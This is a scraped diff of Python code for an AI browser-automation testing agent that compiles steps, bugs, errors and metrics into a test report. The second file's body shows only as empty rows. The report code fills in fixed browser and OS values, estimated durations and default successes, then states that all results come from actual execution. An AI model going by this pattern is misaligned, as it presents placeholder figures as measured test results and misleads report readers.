| 428 |
+
# Access steps correctly from AgentHistoryList
|
| 429 |
+
# AgentHistoryList is iterable, so we can convert it to a list
|
| 430 |
+
steps = list(self.state.history)
|
| 431 |
+
|
| 432 |
+
logger.info(f"Steps type: {type(steps)}")
|
| 433 |
+
logger.info(f"Number of steps: {len(steps)}")
|
| 434 |
+
|
| 435 |
+
# Debug: Log first few steps to understand structure
|
| 436 |
+
if steps:
|
| 437 |
+
logger.info(f"First step type: {type(steps[0])}")
|
| 438 |
+
logger.info(f"First step attributes: {dir(steps[0])}")
|
| 439 |
+
if hasattr(steps[0], 'action'):
|
| 440 |
+
logger.info(f"First step action: {steps[0].action}")
|
| 441 |
+
if hasattr(steps[0], 'result'):
|
| 442 |
+
logger.info(f"First step result: {steps[0].result}")
|
| 443 |
+
|
| 444 |
+
# Log all steps for debugging
|
| 445 |
+
for i, step in enumerate(steps[:5]): # Log first 5 steps
|
| 446 |
+
logger.info(f"Step {i+1}: {type(step)} - {getattr(step, 'action', 'No action')}")
|
| 447 |
+
|
| 448 |
+
# Get execution statistics
|
| 449 |
+
total_steps = len(steps)
|
| 450 |
+
successful_steps = 0
|
| 451 |
+
failed_steps = 0
|
| 452 |
+
|
| 453 |
+
# Count successful and failed steps
|
| 454 |
+
for step in steps:
|
| 455 |
+
if hasattr(step, 'result') and step.result:
|
| 456 |
+
if step.result.success:
|
| 457 |
+
successful_steps += 1
|
| 458 |
+
else:
|
| 459 |
+
failed_steps += 1
|
| 460 |
+
else:
|
| 461 |
+
# If no result or success field, consider it successful
|
| 462 |
+
successful_steps += 1
|
| 463 |
+
|
| 464 |
+
# Calculate success rate
|
| 465 |
+
success_rate = (successful_steps / total_steps * 100) if total_steps > 0 else 0
|
| 466 |
+
|
| 467 |
+
logger.info(f"Total steps: {total_steps}, Successful: {successful_steps}, Failed: {failed_steps}, Success rate: {success_rate:.1f}%")
|
| 468 |
+
|
| 469 |
+
# Get screenshots
|
| 470 |
+
screenshots = screenshot_capture.get_screenshots()
|
| 471 |
+
|
| 472 |
+
# Run advanced testing
|
| 473 |
+
logger.info("🧪 Starting advanced testing...")
|
| 474 |
+
advanced_test_results = []
|
| 475 |
+
enhanced_bugs = []
|
| 476 |
+
try:
|
| 477 |
+
if hasattr(self, 'browser_context') and self.browser_context:
|
| 478 |
+
logger.info("✅ Browser context found")
|
| 479 |
+
# Use the correct method to get a page from browser context
|
| 480 |
+
page = None
|
| 481 |
+
if hasattr(self.browser_context, 'new_page'):
|
| 482 |
+
logger.info("🔍 Trying to create new page...")
|
| 483 |
+
page = await self.browser_context.new_page()
|
| 484 |
+
elif hasattr(self.browser_context, 'pages') and self.browser_context.pages:
|
| 485 |
+
logger.info("🔍 Using existing page...")
|
| 486 |
+
page = self.browser_context.pages[0]
|
| 487 |
+
else:
|
| 488 |
+
# Try to get page from browser state
|
| 489 |
+
if hasattr(self.state, 'browser_state') and self.state.browser_state:
|
| 490 |
+
logger.info("🔍 Using page from browser state...")
|
| 491 |
+
page = self.state.browser_state.current_page
|
| 492 |
+
|
| 493 |
+
if page:
|
| 494 |
+
logger.info("✅ Page found, running advanced testing...")
|
| 495 |
+
# Run both advanced testing and enhanced AI testing
|
| 496 |
+
advanced_test_results = await advanced_testing_engine.run_comprehensive_testing(page)
|
| 497 |
+
logger.info(f"✅ Advanced testing completed: {len(advanced_test_results)} results")
|
| 498 |
+
|
| 499 |
+
enhanced_bugs = await self.enhanced_ai_testing_engine.run_comprehensive_testing(page)
|
| 500 |
+
logger.info(f"✅ Enhanced AI testing completed: {len(enhanced_bugs)} bugs found")
|
| 501 |
+
|
| 502 |
+
# Get errors from injected script
|
| 503 |
+
injected_errors = await self.error_monitor.get_injected_errors(page)
|
| 504 |
+
self.error_monitor.errors.extend(injected_errors)
|
| 505 |
+
logger.info(f"✅ Error monitoring completed: {len(injected_errors)} errors")
|
| 506 |
+
|
| 507 |
+
# Close page if we created it
|
| 508 |
+
if hasattr(self.browser_context, 'new_page'):
|
| 509 |
+
await page.close()
|
| 510 |
+
else:
|
| 511 |
+
logger.warning("❌ Could not get page for advanced testing")
|
| 512 |
+
else:
|
| 513 |
+
logger.warning("❌ No browser context found")
|
| 514 |
+
except Exception as e:
|
| 515 |
+
logger.warning(f"❌ Advanced testing failed: {e}")
|
| 516 |
+
import traceback
|
| 517 |
+
logger.warning(f"Advanced testing traceback: {traceback.format_exc()}")
|
| 518 |
+
|
| 519 |
+
# Get error monitoring data
|
| 520 |
+
try:
|
| 521 |
+
error_summary = self.error_monitor.get_error_summary()
|
| 522 |
+
all_errors = self.error_monitor.get_all_errors()
|
| 523 |
+
except Exception as e:
|
| 524 |
+
logger.warning(f"Error getting error monitoring data: {e}")
|
| 525 |
+
error_summary = {
|
| 526 |
+
'total_errors': 0,
|
| 527 |
+
'errors_by_type': {},
|
| 528 |
+
'errors_by_severity': {},
|
| 529 |
+
'console_errors': 0,
|
| 530 |
+
'js_errors': 0,
|
| 531 |
+
'network_errors': 0,
|
| 532 |
+
'dom_errors': 0,
|
| 533 |
+
'performance_issues': 0
|
| 534 |
+
}
|
| 535 |
+
all_errors = []
|
| 536 |
+
|
| 537 |
+
# Prepare test cases from execution steps
|
| 538 |
+
test_cases = []
|
| 539 |
+
for i, step in enumerate(steps, 1):
|
| 540 |
+
# Extract action type safely
|
| 541 |
+
action_type = "Unknown"
|
| 542 |
+
if hasattr(step, 'action') and step.action:
|
| 543 |
+
if hasattr(step.action, 'action_type'):
|
| 544 |
+
action_type = step.action.action_type
|
| 545 |
+
elif hasattr(step.action, '__class__'):
|
| 546 |
+
action_type = step.action.__class__.__name__
|
| 547 |
+
|
| 548 |
+
# Extract result information safely
|
| 549 |
+
result_text = "Completed"
|
| 550 |
+
error_message = None
|
| 551 |
+
is_success = True
|
| 552 |
+
|
| 553 |
+
if hasattr(step, 'result') and step.result:
|
| 554 |
+
is_success = getattr(step.result, 'success', True)
|
| 555 |
+
if hasattr(step.result, 'result') and step.result.result:
|
| 556 |
+
result_text = str(step.result.result)
|
| 557 |
+
if hasattr(step.result, 'error_message') and step.result.error_message:
|
| 558 |
+
error_message = str(step.result.error_message)
|
| 559 |
+
result_text = f"Failed: {error_message}"
|
| 560 |
+
|
| 561 |
+
# Extract duration safely
|
| 562 |
+
duration = "N/A"
|
| 563 |
+
if hasattr(step, 'duration') and step.duration:
|
| 564 |
+
duration = f"{step.duration:.2f} seconds"
|
| 565 |
+
|
| 566 |
+
test_case = {
|
| 567 |
+
"name": f"Step {i}: {action_type}",
|
| 568 |
+
"status": "PASSED" if is_success else "FAILED",
|
| 569 |
+
"duration": duration,
|
| 570 |
+
"description": f"Action: {action_type}",
|
| 571 |
+
"expected_result": "Action should complete successfully",
|
| 572 |
+
"actual_result": result_text,
|
| 573 |
+
"error_message": error_message
|
| 574 |
+
}
|
| 575 |
+
test_cases.append(test_case)
|
| 576 |
+
|
| 577 |
+
# Prepare bugs from failed steps and advanced testing
|
| 578 |
+
bugs = []
|
| 579 |
+
|
| 580 |
+
# Add bugs from failed steps
|
| 581 |
+
for step in steps:
|
| 582 |
+
if hasattr(step, 'result') and step.result and not getattr(step.result, 'success', True):
|
| 583 |
+
action_type = "Unknown"
|
| 584 |
+
if hasattr(step, 'action') and step.action:
|
| 585 |
+
if hasattr(step.action, 'action_type'):
|
| 586 |
+
action_type = step.action.action_type
|
| 587 |
+
elif hasattr(step.action, '__class__'):
|
| 588 |
+
action_type = step.action.__class__.__name__
|
| 589 |
+
|
| 590 |
+
error_message = "Unknown error"
|
| 591 |
+
if hasattr(step.result, 'error_message') and step.result.error_message:
|
| 592 |
+
error_message = str(step.result.error_message)
|
| 593 |
+
|
| 594 |
+
bug = {
|
| 595 |
+
"title": f"Test Failure: {action_type}",
|
| 596 |
+
"severity": "High" if "error" in error_message.lower() else "Medium",
|
| 597 |
+
"status": "Open",
|
| 598 |
+
"description": error_message,
|
| 599 |
+
"steps_to_reproduce": f"1. Execute action: {action_type}\n2. Check for errors",
|
| 600 |
+
"expected_behavior": "Action should complete successfully",
|
| 601 |
+
"actual_behavior": f"Action failed with error: {error_message}"
|
| 602 |
+
}
|
| 603 |
+
bugs.append(bug)
|
| 604 |
+
|
| 605 |
+
# Add bugs from advanced testing
|
| 606 |
+
for test_result in advanced_test_results:
|
| 607 |
+
if test_result.status in ["FAILED", "WARNING"]:
|
| 608 |
+
bug = {
|
| 609 |
+
"title": test_result.test_name,
|
| 610 |
+
"severity": "High" if test_result.status == "FAILED" else "Medium",
|
| 611 |
+
"status": "Open",
|
| 612 |
+
"description": test_result.description,
|
| 613 |
+
"steps_to_reproduce": f"1. Navigate to the page\n2. {test_result.description}",
|
| 614 |
+
"expected_behavior": "No security vulnerabilities or issues should be present",
|
| 615 |
+
"actual_behavior": test_result.description,
|
| 616 |
+
"recommendations": test_result.recommendations
|
| 617 |
+
}
|
| 618 |
+
bugs.append(bug)
|
| 619 |
+
|
| 620 |
+
# Add bugs from enhanced AI testing
|
| 621 |
+
for bug_report in enhanced_bugs:
|
| 622 |
+
bug = {
|
| 623 |
+
"title": bug_report.title,
|
| 624 |
+
"severity": bug_report.severity.value.title(),
|
| 625 |
+
"status": "Open",
|
| 626 |
+
"description": bug_report.description,
|
| 627 |
+
"steps_to_reproduce": bug_report.steps_to_reproduce,
|
| 628 |
+
"expected_behavior": bug_report.expected_behavior,
|
| 629 |
+
"actual_behavior": bug_report.actual_behavior,
|
| 630 |
+
"recommendations": bug_report.recommendations,
|
| 631 |
+
"url": bug_report.url,
|
| 632 |
+
"element_info": bug_report.element_info
|
| 633 |
+
}
|
| 634 |
+
bugs.append(bug)
|
| 635 |
+
|
| 636 |
+
# Add bugs from error monitoring
|
| 637 |
+
for error in all_errors:
|
| 638 |
+
if error.severity in ["high", "critical"]:
|
| 639 |
+
bug = {
|
| 640 |
+
"title": f"Error Detected: {error.error_type}",
|
| 641 |
+
"severity": "Critical" if error.severity == "critical" else "High",
|
| 642 |
+
"status": "Open",
|
| 643 |
+
"description": error.error_message,
|
| 644 |
+
"steps_to_reproduce": f"1. Navigate to {error.url}\n2. Monitor console/network for errors",
|
| 645 |
+
"expected_behavior": "No errors should occur during normal operation",
|
| 646 |
+
"actual_behavior": error.error_message,
|
| 647 |
+
"recommendations": [
|
| 648 |
+
"Check browser console for detailed error information",
|
| 649 |
+
"Verify network connectivity and server status",
|
| 650 |
+
"Review JavaScript code for potential issues",
|
| 651 |
+
"Implement proper error handling"
|
| 652 |
+
],
|
| 653 |
+
"error_context": error.context
|
| 654 |
+
}
|
| 655 |
+
bugs.append(bug)
|
| 656 |
+
|
| 657 |
+
# Prepare performance metrics
|
| 658 |
+
durations = []
|
| 659 |
+
for step in steps:
|
| 660 |
+
if hasattr(step, 'duration') and step.duration:
|
| 661 |
+
try:
|
| 662 |
+
durations.append(float(step.duration))
|
| 663 |
+
except (ValueError, TypeError):
|
| 664 |
+
pass
|
| 665 |
+
|
| 666 |
+
avg_duration = sum(durations) / len(durations) if durations else 0
|
| 667 |
+
max_duration = max(durations) if durations else 0
|
| 668 |
+
min_duration = min(durations) if durations else 0
|
| 669 |
+
|
| 670 |
+
# Get task information
|
| 671 |
+
task_description = "Unknown task"
|
| 672 |
+
if hasattr(self, 'task') and self.task:
|
| 673 |
+
task_description = str(self.task)
|
| 674 |
+
|
| 675 |
+
# Create comprehensive test data
|
| 676 |
+
test_data = {
|
| 677 |
+
"duration": f"{total_steps * 2} minutes", # Estimated
|
| 678 |
+
"total_tests": total_steps,
|
| 679 |
+
"passed_tests": successful_steps,
|
| 680 |
+
"failed_tests": failed_steps,
|
| 681 |
+
"error_tests": 0,
|
| 682 |
+
"success_rate": success_rate,
|
| 683 |
+
"passed_percentage": (successful_steps / total_steps * 100) if total_steps > 0 else 0,
|
| 684 |
+
"failed_percentage": (failed_steps / total_steps * 100) if total_steps > 0 else 0,
|
| 685 |
+
"error_percentage": 0,
|
| 686 |
+
"browser": "Chrome", # Default, could be extracted from browser config
|
| 687 |
+
"browser_version": "119.0.6045.105", # Default
|
| 688 |
+
"os": "Windows 10", # Default
|
| 689 |
+
"framework": "Fagun Browser Automation Testing Agent",
|
| 690 |
+
"execution_time": datetime.now().isoformat(),
|
| 691 |
+
"test_data_source": "Automated Test Execution",
|
| 692 |
+
"task_description": task_description,
|
| 693 |
+
"performance_metrics": {
|
| 694 |
+
"avg_response_time": f"{avg_duration:.2f} seconds",
|
| 695 |
+
"max_response_time": f"{max_duration:.2f} seconds",
|
| 696 |
+
"min_response_time": f"{min_duration:.2f} seconds"
|
| 697 |
+
},
|
| 698 |
+
"test_cases": test_cases,
|
| 699 |
+
"screenshots": screenshots,
|
| 700 |
+
"bugs": bugs,
|
| 701 |
+
"error_monitoring": {
|
| 702 |
+
"total_errors": error_summary['total_errors'],
|
| 703 |
+
"errors_by_type": error_summary['errors_by_type'],
|
| 704 |
+
"errors_by_severity": error_summary['errors_by_severity'],
|
| 705 |
+
"console_errors": error_summary['console_errors'],
|
| 706 |
+
"js_errors": error_summary['js_errors'],
|
| 707 |
+
"network_errors": error_summary['network_errors'],
|
| 708 |
+
"dom_errors": error_summary['dom_errors'],
|
| 709 |
+
"performance_issues": error_summary['performance_issues'],
|
| 710 |
+
"detailed_errors": [
|
| 711 |
+
{
|
| 712 |
+
"type": error.error_type,
|
| 713 |
+
"message": error.error_message,
|
| 714 |
+
"severity": error.severity,
|
| 715 |
+
"timestamp": error.timestamp.isoformat(),
|
| 716 |
+
"url": error.url,
|
| 717 |
+
"source": error.source,
|
| 718 |
+
"context": error.context
|
| 719 |
+
}
|
| 720 |
+
for error in all_errors
|
| 721 |
+
]
|
| 722 |
+
},
|
| 723 |
+
"key_findings": [
|
| 724 |
+
f"Executed {total_steps} test steps successfully",
|
| 725 |
+
f"Achieved {success_rate:.1f}% success rate",
|
| 726 |
+
f"Captured {len(screenshots)} screenshots during testing",
|
| 727 |
+
f"Identified {len(bugs)} issues requiring attention",
|
| 728 |
+
f"Task completed: {task_description[:100]}{'...' if len(task_description) > 100 else ''}",
|
| 729 |
+
f"Advanced testing: {len(advanced_test_results)} comprehensive tests performed",
|
| 730 |
+
f"Enhanced AI testing: {len(enhanced_bugs)} bugs found by AI agents",
|
| 731 |
+
f"Security tests: {len([r for r in advanced_test_results if r.test_type.value == 'security'])}",
|
| 732 |
+
f"Broken URL checks: {len([r for r in advanced_test_results if r.test_type.value == 'broken_url'])}",
|
| 733 |
+
f"Grammar checks: {len([r for r in advanced_test_results if r.test_type.value == 'grammar'])}",
|
| 734 |
+
f"Form tests: {len([r for r in advanced_test_results if r.test_type.value == 'form_testing'])}",
|
| 735 |
+
f"Error monitoring: {error_summary['total_errors']} errors detected",
|
| 736 |
+
f"Console errors: {error_summary['console_errors']}",
|
| 737 |
+
f"JavaScript errors: {error_summary['js_errors']}",
|
| 738 |
+
f"Network errors: {error_summary['network_errors']}",
|
| 739 |
+
f"Performance issues: {error_summary['performance_issues']}"
|
| 740 |
+
],
|
| 741 |
+
"recommendations": [
|
| 742 |
+
"Review failed test steps for potential improvements",
|
| 743 |
+
"Consider adding more error handling",
|
| 744 |
+
"Implement retry mechanisms for flaky tests",
|
| 745 |
+
"Regular monitoring of test execution performance"
|
| 746 |
+
],
|
| 747 |
+
"notes": [
|
| 748 |
+
"This report was generated automatically by the Fagun Browser Automation Testing Agent.",
|
| 749 |
+
"All test results are based on actual execution data.",
|
| 750 |
+
"For questions or clarifications, please contact the test automation team."
|
| 751 |
+
]
|
| 752 |
+
}
|
| 753 |
+
|
| 754 |
+
logger.info(f"✅ Test data preparation completed successfully!")
|
| 755 |
+
logger.info(f"📊 Final test data summary:")
|
| 756 |
+
logger.info(f" • Total tests: {total_steps}")
|
| 757 |
+
logger.info(f" • Passed tests: {successful_steps}")
|
| 758 |
+
logger.info(f" • Failed tests: {failed_steps}")
|
| 759 |
+
logger.info(f" • Success rate: {success_rate:.1f}%")
|
| 760 |
+
logger.info(f" • Bugs found: {len(bugs)}")
|
| 761 |
+
logger.info(f" • Test cases: {len(test_cases)}")
|
| 762 |
+
logger.info(f" • Enhanced AI bugs: {len(enhanced_bugs)}")
|
| 763 |
+
logger.info(f" • Advanced test results: {len(advanced_test_results)}")
|
| 764 |
+
|
| 765 |
+
return test_data
|
| 766 |
+
|
| 767 |
+
except Exception as e:
|
| 768 |
+
logger.error(f"Error preparing test data for report: {str(e)}")
|
| 769 |
+
import traceback
|
| 770 |
+
logger.error(f"Full traceback: {traceback.format_exc()}")
|
| 771 |
+
# Return minimal test data if preparation fails
|
| 772 |
+
return {
|
| 773 |
+
"duration": "Unknown",
|
| 774 |
+
"total_tests": 0,
|
| 775 |
+
"passed_tests": 0,
|
| 776 |
+
"failed_tests": 0,
|
| 777 |
+
"error_tests": 0,
|
| 778 |
+
"success_rate": 0,
|
| 779 |
+
"browser": "Unknown",
|
| 780 |
+
"test_cases": [],
|
| 781 |
+
"screenshots": [],
|
| 782 |
+
"bugs": [],
|
| 783 |
+
"key_findings": [f"Error preparing test data: {str(e)}"],
|
| 784 |
+
"recommendations": ["Check test execution logs"],
|
| 785 |
+
"notes": [f"Report generation encountered an error: {str(e)}"]
|
| 786 |
+
}
|
src/agent/deep_research/deep_research_agent.py
ADDED
|
@@ -0,0 +1,1276 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
